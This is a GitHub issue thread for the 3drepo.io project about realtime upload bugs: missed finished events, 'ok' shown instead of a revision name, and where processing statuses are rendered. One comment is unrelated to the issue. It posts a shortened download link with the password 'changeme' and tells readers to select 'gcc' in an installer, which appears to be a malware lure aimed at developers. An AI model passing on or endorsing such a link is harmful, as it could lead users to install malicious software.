### ISSUE TITLE
[2D MVP] Milestone 1: Realtime upload fixes

### ISSUE THREAD

**Issue by sanmont3drepo** [3drepo/3drepo.io#5127]
### Description
Product issue:  https://github.com/3drepo/3D-Repo-Product-Team/issues/377.

### Bugs
3 things here:
- [ ] Screen that isn't uploading is getting the new container/processing event, but it never processed the finished event (this may be a race condition on the messages, if it is please ignore)
- [ ] Screen that did the upload is processing all the events, but when it is done it's showing `ok` instead of the name of th e revision
- [ ] The rendering of the processing statuses should be different? (Should be inline with container)

![24-08-27 10-39-19](https://github.com/user-attachments/assets/87f46e24-d440-406b-b1bc-9044aff30ce5)

### Related Resources

MockUp : `link to mockup`

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by sanmont3drepo** [comment]
merged in base branch
